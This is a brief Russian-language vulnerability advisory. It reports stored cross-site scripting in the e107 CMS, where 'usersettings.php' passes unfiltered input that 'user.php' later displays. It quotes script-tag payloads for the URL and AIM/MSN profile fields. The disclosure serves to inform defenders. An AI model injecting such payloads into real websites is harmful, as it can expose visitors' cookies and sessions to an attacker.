• Партнер

  • Программа: e107 

    Уязвимость обнаружена в e107. Удаленный авторизованный пользователь может выполнить XSS нападение.
    Сценарий 'usersettings.php' не фильтрует данные, представленные пользователем, перед тем, как 'user.php' отобразит информацию. 

    Пример: 

    URL field:
    http://www.mysiteurl.com/<script>alert(document.cookie)</script>

    AIM/MSN field: 
    <script>alert(document.cookie)</script>

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии